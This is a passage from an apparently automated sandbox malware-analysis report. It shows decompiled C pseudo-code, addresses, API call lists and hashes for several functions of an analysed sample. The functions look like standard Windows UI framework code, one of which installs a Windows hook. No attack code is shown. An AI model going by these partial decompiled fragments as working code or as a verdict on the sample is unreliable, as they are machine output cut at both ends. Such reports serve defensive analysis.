					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                  0x0042495d
                  0x0042495d
                  0x00424969
                  0x0042496b
                  0x00424972
                  0x00424a4a
                  0x00424a55
                  0x00424a55
                  0x00424978
                  0x00424979
                  0x0042497e
                  0x00000000
                  0x00000000
                  0x00424987
                  0x004249cb
                  0x004249cb
                  0x004249d1
                  0x004249de
                  0x004249e2
                  0x00424a49
                  0x00000000
                  0x004249e8
                  0x004249e8
                  0x004249eb
                  0x004249ed
                  0x004249fe
                  0x00424a05
                  0x00424a07
                  0x00424a0a
                  0x00424a0e
                  0x00424a10
                  0x00424a12
                  0x00424a13
                  0x00424a18
                  0x00424a1b
                  0x00424a1e
                  0x00424a24
                  0x00424a2b
                  0x00424a31
                  0x00424a36
                  0x00424a46
                  0x00424a46
                  0x00424a36
                  0x00000000
                  0x00424a05
                  0x004249ef
                  0x004249fc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004249fc
                  0x004249e2
                  0x0042498d
                  0x0042498f
                  0x00424996
                  0x00424998
                  0x0042499b
                  0x0042499d
                  0x004249a1
                  0x004249a1
                  0x0042499d
                  0x00424996
                  0x004249a6
                  0x004249ae
                  0x004249b6
                  0x004249be
                  0x004249c6
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __msize_malloc
                  • String ID:
                  • API String ID: 1288803200-0
                  • Opcode ID: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction ID: a563689fdaf21f1efb45e35565f73d8a1b00968b58a58eb4e159542aa28b78ed
                  • Opcode Fuzzy Hash: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction Fuzzy Hash: B821D6707006209FCB24AF75E88165F77A4FFC4364B50852FE8188B696DB38DC91CA8C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416327, Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00416327(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr* _t44;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				intOrPtr* _t71;
				intOrPtr* _t73;
				void* _t75;
				void* _t76;

				_t76 = __eflags;
				_push(0x60);
				E00431ACE(E0044B391, __ebx, __edi, __esi);
				_t71 =  *((intOrPtr*)(_t75 + 8));
				_t73 =  *((intOrPtr*)(_t71 + 4));
				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
				E0040D77C(_t75 - 0x68, _t76);
				 *(_t75 - 4) = 0;
				 *(_t75 - 4) = 1;
				 *((intOrPtr*)(E0041EDAB(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
				_t36 = E0041F363(0, _t71, _t73, _t76);
				_t9 = _t36 + 0x74; // 0x74
				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
				 *((intOrPtr*)(E00409F26(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
				E004161F7(_t73, _t76);
				_t40 =  *((intOrPtr*)(E0041F363(0, _t71, _t73, _t76) + 4));
				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
					_t54 =  *((intOrPtr*)(_t40 + 0x20));
					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
						E0040EE89(_t75 - 0x68,  *((intOrPtr*)(_t54 + 0x20)));
						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
					}
				}
				 *(_t75 - 4) = 0;
				_t59 =  *(_t71 + 0x14);
				SetEvent( *(_t71 + 0x10));
				WaitForSingleObject(_t59, 0xffffffff);
				CloseHandle(_t59);
				_t44 =  *((intOrPtr*)(_t73 + 0x38));
				_t81 = _t44;
				if(_t44 == 0) {
					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
					__eflags = _t46;
					_t47 =  *_t73;
					if(_t46 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
					} else {
						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
					}
				} else {
					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
				}
				E0040EEC5(_t59, _t75 - 0x68);
				E00415EE7(_t75 - 0x68, _t81, _t48, 1);
				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
				E0040F76D(_t59, _t75 - 0x68, _t71, _t48, _t81);
				return E00431B73(0);
			}















                  0x00416327
                  0x00416327
                  0x0041632e
                  0x00416333
                  0x00416336
                  0x0041633c
                  0x0041633f
                  0x00416346
                  0x00416349
                  0x00416357
                  0x0041635a
                  0x0041635f
                  0x00416362
                  0x0041636a
                  0x0041636d
                  0x00416377
                  0x0041637c
                  0x00416383
                  0x00416388
                  0x00416395
                  0x0041639d
                  0x0041639d
                  0x00416388
                  0x004163a0
                  0x004163dc
                  0x004163df
                  0x004163e8
                  0x004163ef
                  0x004163f5
                  0x004163f8
                  0x004163fa
                  0x00416408
                  0x0041640b
                  0x0041640d
                  0x00416411
                  0x00416418
                  0x00416413
                  0x00416413
                  0x00416413
                  0x004163fc
                  0x004163ff
                  0x00416401
                  0x00416420
                  0x00416428
                  0x0041642d
                  0x00416434
                  0x00416440

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041632E
                    • Part of subcall function 004161F7: GetCurrentThreadId.KERNEL32 ref: 0041620A
                    • Part of subcall function 004161F7: SetWindowsHookExA.USER32 ref: 0041621A
                  • SetEvent.KERNEL32(?,00000060), ref: 004163DF
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004163E8
                  • CloseHandle.KERNEL32(?), ref: 004163EF
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                  • String ID:
                  • API String ID: 1532457625-0
                  • Opcode ID: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction ID: 7d1a66d4e27a964e3f0b4e2036f0cf801379f83b2f6e36c6b0dae80c5e1ed748
                  • Opcode Fuzzy Hash: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction Fuzzy Hash: 1D318D74A00705DFCB10EFB2C58499DBBB0BF08314B11457EE45A973A2DB38EA85CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042BBEC, Relevance: 6.1, APIs: 4, Instructions: 75windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042BBEC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t44;
				void* _t52;
				void* _t60;
				void* _t73;
				intOrPtr* _t74;
				void* _t75;
				void* _t76;

				_t68 = __edx;
				_push(8);
				E00431A9B(E0044B09C, __ebx, __edi, __esi);
				_t73 = __ecx;
				_t55 = 0;
				_t71 = 1;
				 *((intOrPtr*)(_t76 - 0x14)) = 0;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
					if(__eflags == 0) {
						goto L10;
					} else {
						__eflags =  *(__ecx + 0x20);
						if(__eflags == 0) {
							goto L10;
						} else {
							E004014C0(_t76 - 0x10, __edx);
							 *(_t76 - 4) = 1;
							_t71 = 0x104;
							_t55 = E004014F0(_t76 - 0x10, 0x104);
							_t44 = SendMessageA( *(E0040EE3C(_t55, _t76 - 0x10, GetParent( *(_t73 + 0x20))) + 0x20), 0x464, 0x104, _t55);
							_t60 = _t76 - 0x10;
							__eflags = _t44;
							if(_t44 >= 0) {
								goto L5;
							} else {
								E00401E30(_t60);
								 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t76 - 0x10)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t76 - 0x10)) + 0xfffffff0, _t68);
								goto L10;
							}
						}
					}
				} else {
					_t79 =  *(__ecx + 0x20);
					if( *(__ecx + 0x20) == 0) {
						L10:
						_push( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x74)) + 0x24)));
						E00406039(_t55,  *((intOrPtr*)(_t76 + 8)), _t68, _t71, _t73, __eflags);
					} else {
						_t74 =  *((intOrPtr*)(__ecx + 0x80));
						_t52 =  *((intOrPtr*)( *_t74 + 0x40))(_t74, _t76 - 0x14);
						_push( *((intOrPtr*)(_t76 - 0x14)));
						_t75 = _t52;
						E00405EE2(0, _t76 - 0x10, __edx, 1, _t75, _t79);
						_t80 = _t75;
						 *(_t76 - 4) = 0;
						if(_t75 >= 0) {
							__imp__CoTaskMemFree( *((intOrPtr*)(_t76 - 0x14)));
						}
						_t60 = _t76 - 0x10;
						L5:
						E0040A356(_t60, 0xffffffff);
						E00405562( *((intOrPtr*)(_t76 + 8)), _t80, _t76 - 0x10);
						E004010B0( *((intOrPtr*)(_t76 - 0x10)) + 0xfffffff0, _t68);
					}
				}
				return E00431B73( *((intOrPtr*)(_t76 + 8)));
			}










                  0x0042bbec
                  0x0042bbec
                  0x0042bbf3
                  0x0042bbf8
                  0x0042bbfc
                  0x0042bbfe
                  0x0042bbff
                  0x0042bc05
                  0x0042bc63
                  0x0042bc6a
                  0x00000000
                  0x0042bc6c
                  0x0042bc6c
                  0x0042bc6f
                  0x00000000
                  0x0042bc71
                  0x0042bc74
                  0x0042bc79
                  0x0042bc7c
                  0x0042bc8d
                  0x0042bca5
                  0x0042bcab
                  0x0042bcae
                  0x0042bcb0
                  0x00000000
                  0x0042bcb2
                  0x0042bcb2
                  0x0042bcba
                  0x0042bcbe
                  0x0042bcc1
                  0x00000000
                  0x0042bcc1
                  0x0042bcb0
                  0x0042bc6f
                  0x0042bc07
                  0x0042bc07
                  0x0042bc0a
                  0x0042bcc6
                  0x0042bcc9
                  0x0042bccf
                  0x0042bc10
                  0x0042bc10
                  0x0042bc1d
                  0x0042bc20
                  0x0042bc26
                  0x0042bc28
                  0x0042bc2d
                  0x0042bc2f
                  0x0042bc32
                  0x0042bc37
                  0x0042bc37
                  0x0042bc3d
                  0x0042bc40
                  0x0042bc42
                  0x0042bc4e
                  0x0042bc59
                  0x0042bc59
                  0x0042bc0a
                  0x0042bcdc

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BBF3
                  • CoTaskMemFree.OLE32(?,?), ref: 0042BC37
                  • GetParent.USER32(?), ref: 0042BC8F
                  • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0042BCA5
                    • Part of subcall function 00405EE2: __EH_prolog3.LIBCMT ref: 00405EE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$FreeMessageParentSendTask
                  • String ID:
                  • API String ID: 2222212998-0
                  • Opcode ID: b73e0152d6fdc2997f976b2ca9bf5ddb2d6980817e19d256bc71204b4bc375e3
                  • Instruction ID: 754a8734e2c99e6b0d5e79b7130ea0a6c5940324f4a321b71c72100cdfec6ab8
                  • Opcode Fuzzy Hash: b73e0152d6fdc2997f976b2ca9bf5ddb2d6980817e19d256bc71204b4bc375e3
                  • Instruction Fuzzy Hash: 4F21C17190061ADBCF10EFB2C9859AFB7B0FF10318B14062EF162672E1DB349900CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040B9CA, Relevance: 6.1, APIs: 4, Instructions: 74windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0040B9CA(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				int _t36;
				intOrPtr _t41;
				void* _t45;
				void* _t46;
				intOrPtr* _t47;
				intOrPtr* _t61;
				intOrPtr _t62;

				_t61 = __ecx;
				_push(0);
				E00422E1F(_t45,  &_v52, 0, __ecx, __eflags);
				_t26 = SendMessageA( *(_t61 + 0x20), 0x31, 0, 0);
				_t46 = 0;
				if(_t26 != 0) {
					_t46 = E0040B938( &_v52, _t26);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t65 = _t46;
				if(_t46 != 0) {
					E0040B938( &_v52, _t46);
				}
				E00422E73(_t46,  &_v52, 0, _t61, _t65);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t61 + 0x148))( &_v32, _a12);
				 *((intOrPtr*)( *_t61 + 0x118))(0x407, 0,  &_v16);
				_t47 = _a4;
				 *_t47 = 0x7fff;
				_t36 = GetSystemMetrics(6);
				_t62 =  *((intOrPtr*)(_t61 + 0x98));
				_t41 = _t36 + _v12 + _t36 + _v12 - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				 *((intOrPtr*)(_t47 + 4)) = _t41;
				if(_t41 < _t62) {
					 *((intOrPtr*)(_t47 + 4)) = _t62;
				}
				return _t47;
			}





















                  0x0040b9d5
                  0x0040b9d9
                  0x0040b9dd
                  0x0040b9e9
                  0x0040b9ef
                  0x0040b9f3
                  0x0040b9fe
                  0x0040b9fe
                  0x0040ba07
                  0x0040ba0d
                  0x0040ba0f
                  0x0040ba15
                  0x0040ba15
                  0x0040ba1d
                  0x0040ba26
                  0x0040ba37
                  0x0040ba4b
                  0x0040ba54
                  0x0040ba5c
                  0x0040ba62
                  0x0040ba6e
                  0x0040ba7b
                  0x0040ba81
                  0x0040ba84
                  0x0040ba86
                  0x0040ba86
                  0x0040ba8f

                  APIs
                    • Part of subcall function 00422E1F: __EH_prolog3.LIBCMT ref: 00422E26
                    • Part of subcall function 00422E1F: GetDC.USER32(00000000), ref: 00422E52
                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040B9E9
                  • GetTextMetricsA.GDI32(?,?), ref: 0040BA07
                  • SetRectEmpty.USER32(?), ref: 0040BA26
                  • GetSystemMetrics.USER32 ref: 0040BA62
                    • Part of subcall function 0040B938: SelectObject.GDI32(?,?), ref: 0040B94A
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Metrics$EmptyH_prolog3MessageObjectRectSelectSendSystemText
                  • String ID:
                  • API String ID: 2929776503-0
                  • Opcode ID: b6d62122e104296e256eb2fde8e9ddac0997ee7bcec28293eb3df92475516051
                  • Instruction ID: 3858aa5ce32ef3400427a4d84063dc5ac9b41b4967d50f72e5b04e13c65bd1a8
                  • Opcode Fuzzy Hash: b6d62122e104296e256eb2fde8e9ddac0997ee7bcec28293eb3df92475516051
                  • Instruction Fuzzy Hash: C621B372A00218AFCB10DFA5DC89DDEBBB9FF94704F04002AF506A7291DB706801CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424BC4, Relevance: 6.1, APIs: 4, Instructions: 66windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E00424BC4(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __esi;
				void* __ebp;
				void* _t15;
				intOrPtr _t18;
				void* _t22;
				void* _t30;
				void* _t31;
				void* _t39;
				intOrPtr _t43;

				_t39 = __edi;
				_t30 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t43 = __ecx;
				_v12 = __ecx;
				_t15 = E0040ED96(__ecx, __eflags);
				if(_t15 != 0) {
					if((E00412B38(_t43) & 0x00000100) != 0) {
						_t35 = _t43;
						_t18 = E004105B2(__ebx, _t43, __edi);
						_v8 = _t18;
						_t49 = _t18;
						if(_t18 == 0) {
							E00406436(__ebx, _t35, __edi, _t43, _t49);
						}
						_push(_t30);
						_push(_t39);
						_t31 = E0040EE3C(_t30, _t35, GetForegroundWindow());
						if(_v8 == _t31 || E0040EE3C(_t31, _t35, GetLastActivePopup( *(_v8 + 0x20))) == _t31 && SendMessageA( *(_t31 + 0x20), 0x36d, 0x40, 0) != 0) {
							_t22 = 1;
							__eflags = 1;
						} else {
							_t22 = 0;
						}
						SendMessageA( *(_v12 + 0x20), 0x36d, 4 + (0 | _t22 == 0x00000000) * 4, 0);
					}
					_t15 = 1;
				}
				return _t15;
			}














                  0x00424bc4
                  0x00424bc4
                  0x00424bc9
                  0x00424bca
                  0x00424bcc
                  0x00424bce
                  0x00424bd1
                  0x00424bd8
                  0x00424bea
                  0x00424bec
                  0x00424bee
                  0x00424bf3
                  0x00424bf6
                  0x00424bf8
                  0x00424bfa
                  0x00424bfa
                  0x00424bff
                  0x00424c00
                  0x00424c13
                  0x00424c1d
                  0x00424c49
                  0x00424c49
                  0x00424c43
                  0x00424c43
                  0x00424c43
                  0x00424c62
                  0x00424c65
                  0x00424c68
                  0x00424c68
                  0x00424c6b

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetForegroundWindow.USER32 ref: 00424C01
                  • GetLastActivePopup.USER32(?), ref: 00424C25
                  • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00424C3D
                  • SendMessageA.USER32(?,0000036D,00000000,00000000), ref: 00424C62
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                  • String ID:
                  • API String ID: 2019557511-0
                  • Opcode ID: da8f0325275f4c013f387e86fa7bf50d154115ffdca63c4d9d26d7428e297965
                  • Instruction ID: c5b05cd195cb087c410fb02c105aa630a277884f1bcc14efd6469061374fb6a8
                  • Opcode Fuzzy Hash: da8f0325275f4c013f387e86fa7bf50d154115ffdca63c4d9d26d7428e297965
                  • Instruction Fuzzy Hash: 3A11E772B10221BBDB14ABA7ED49F5F3A68EBC5704F02003BB501D3150E678DD00866D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403C90, Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                  Download Yara Rule
                  C-Code - Quality: 70%
                  			E00403C90() {
				char _v4;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t28;
				void* _t29;
				void* _t39;
				intOrPtr* _t41;
				void* _t49;
				void* _t56;
				intOrPtr* _t58;

				_t58 = _t41;
				_t59 =  *((intOrPtr*)(_t58 + 0x70));
				if( *((intOrPtr*)(_t58 + 0x70)) == 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(_t58 + 0x74);
					_push(E00401000);
					 *((intOrPtr*)(_t58 + 0x70)) = E0041654E(_t39, _t49, _t56, _t58, _t59);
				}
				 *((intOrPtr*)(_t58 + 0x74)) =  *((intOrPtr*)(_t58 + 0x54));
				 *((intOrPtr*)(_t58 + 0x78)) =  *((intOrPtr*)(_t58 + 0x58));
				_v4 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x60))))();
				 *((intOrPtr*)(_t58 + 0x80)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t58 + 0x64))))( &_v4) + 0x20));
				_t28 = E00415AD9();
				if(_t28 == 0) {
					_t29 = 0;
					__eflags = 0;
				} else {
					_t29 =  *((intOrPtr*)( *((intOrPtr*)( *_t28 + 0x74))))();
				}
				 *((intOrPtr*)(_t58 + 0x98)) =  *((intOrPtr*)(_t29 + 0x20));
				 *((intOrPtr*)(_t58 + 0x94)) =  *((intOrPtr*)(_t58 + 0x68));
				SetEvent( *(_t58 + 0xa0));
				ResetEvent( *(_t58 + 0xa4));
				ResetEvent( *(_t58 + 0xa8));
				return SetEvent( *(_t58 + 0x9c));
			}














                  0x00403c93
                  0x00403c95
                  0x00403c9a
                  0x00403c9c
                  0x00403c9e
                  0x00403ca0
                  0x00403ca2
                  0x00403ca7
                  0x00403ca8
                  0x00403cb2
                  0x00403cb2
                  0x00403cbd
                  0x00403cc0
                  0x00403cca
                  0x00403cdf
                  0x00403ce5
                  0x00403cec
                  0x00403cf9
                  0x00403cf9
                  0x00403cee
                  0x00403cf5
                  0x00403cf5
                  0x00403d0e
                  0x00403d14
                  0x00403d1a
                  0x00403d29
                  0x00403d32
                  0x00403d41

                  APIs
                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D1A
                  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D29
                  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D32
                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,004041CE), ref: 00403D3B
                    • Part of subcall function 0041654E: __EH_prolog3.LIBCMT ref: 00416555
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Event$Reset$H_prolog3
                  • String ID:
                  • API String ID: 1647141661-0
                  • Opcode ID: 709a66e5f2637e804bb7ed9751c886f99ab2a0227d78f22866f377ca394a7a9f
                  • Instruction ID: 63ee60c4411b203e934d3d9de603bf4f0dc456143a182f16260b2fbe1bd332e1
                  • Opcode Fuzzy Hash: 709a66e5f2637e804bb7ed9751c886f99ab2a0227d78f22866f377ca394a7a9f
                  • Instruction Fuzzy Hash: 6621E275600B009FD324DB79C881B56B7E9BF88700F218A6EE69AD73A0DB74E8018B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042C4B2, Relevance: 6.1, APIs: 4, Instructions: 61windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E0042C4B2(int __ebx, intOrPtr* __ecx) {
				signed int _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t22;
				intOrPtr* _t24;
				signed int _t26;
				signed int _t27;
				int _t30;
				void* _t36;
				intOrPtr* _t39;

				_t30 = __ebx;
				_push(__ecx);
				_t39 = __ecx;
				_v8 =  *((intOrPtr*)( *__ecx + 0x1ac))();
				_t22 = CreateMenu();
				 *(_t39 + 0x110) = _t22;
				if(_t22 != 0) {
					_t36 = _t39 + 0x114;
					E00431160(_t36, _t36, 0, 0x18);
					_t24 =  *((intOrPtr*)(_t39 + 0x100));
					_push(_t36);
					_push( *(_t39 + 0x110));
					_push(_t24);
					if( *((intOrPtr*)( *_t24 + 0x24))() == 0) {
						_t26 = 0;
						__eflags = _v8;
						if(_v8 != 0) {
							__eflags =  *(_t39 + 0x128);
							if(__eflags != 0) {
								_t26 = 1;
								__eflags = 1;
							}
							_t27 = E0040607D(_t30, _t36, _t39, __eflags,  *(_t39 + 0x110), _v8, _t36, 1, _t26);
							 *(_t39 + 0x158) = _t27;
							__imp__OleCreateMenuDescriptor( *(_t39 + 0x110), _t36);
							__eflags = _t27;
							_t18 = _t27 != 0;
							__eflags = _t18;
							 *(_t39 + 0x12c) = _t27;
							_t22 = 0 | _t18;
						} else {
							_t22 = 1;
						}
					} else {
						DestroyMenu( *(_t39 + 0x110));
						 *(_t39 + 0x110) =  *(_t39 + 0x110) & 0x00000000;
						_t22 = 0;
					}
				}
				return _t22;
			}














                  0x0042c4b2
                  0x0042c4b7
                  0x0042c4b9
                  0x0042c4c3
                  0x0042c4c6
                  0x0042c4cc
                  0x0042c4d4
                  0x0042c4dd
                  0x0042c4e6
                  0x0042c4eb
                  0x0042c4f6
                  0x0042c4f7
                  0x0042c4fd
                  0x0042c503
                  0x0042c51c
                  0x0042c51e
                  0x0042c521
                  0x0042c526
                  0x0042c52c
                  0x0042c530
                  0x0042c530
                  0x0042c530
                  0x0042c53e
                  0x0042c54a
                  0x0042c550
                  0x0042c558
                  0x0042c55a
                  0x0042c55a
                  0x0042c55d
                  0x0042c563
                  0x0042c523
                  0x0042c523
                  0x0042c523
                  0x0042c505
                  0x0042c50b
                  0x0042c511
                  0x0042c518
                  0x0042c518
                  0x0042c565
                  0x0042c568

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CreateDestroy_memset
                  • String ID:
                  • API String ID: 2954890696-0
                  • Opcode ID: da75aa6dce72ff148ce3907d131c25f27a074466cf39f28214722d06d9364804
                  • Instruction ID: 1409fe51e83d3908d748dd315e3910663c0b8c09aba28d5bb9e855037b89c16d
                  • Opcode Fuzzy Hash: da75aa6dce72ff148ce3907d131c25f27a074466cf39f28214722d06d9364804
                  • Instruction Fuzzy Hash: 5A118E70A00714AFDB259B31DC49BDB7AE8EF49740F50082EE566D2150DBB1A940DA58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C667, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0041C667(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				wchar_t* _t38;
				int _t39;
				intOrPtr _t44;
				intOrPtr _t51;
				signed int _t52;
				void* _t54;
				void* _t55;

				_t49 = __edx;
				_push(0x60);
				E00431B04(E0044B9C2, __ebx, __edi, __esi);
				_t44 =  *((intOrPtr*)(_t55 + 8));
				_t51 =  *((intOrPtr*)(_t55 + 0xc));
				_t54 = __ecx;
				 *((intOrPtr*)(_t55 - 0x68)) = _t44 + _t51 - 1;
				 *((intOrPtr*)(_t55 - 0x6c)) =  *((intOrPtr*)(E00415AD9() + 0x20));
				_t52 = 0 | _t51 != 0x00000001;
				E004014C0(_t55 - 0x64, __edx);
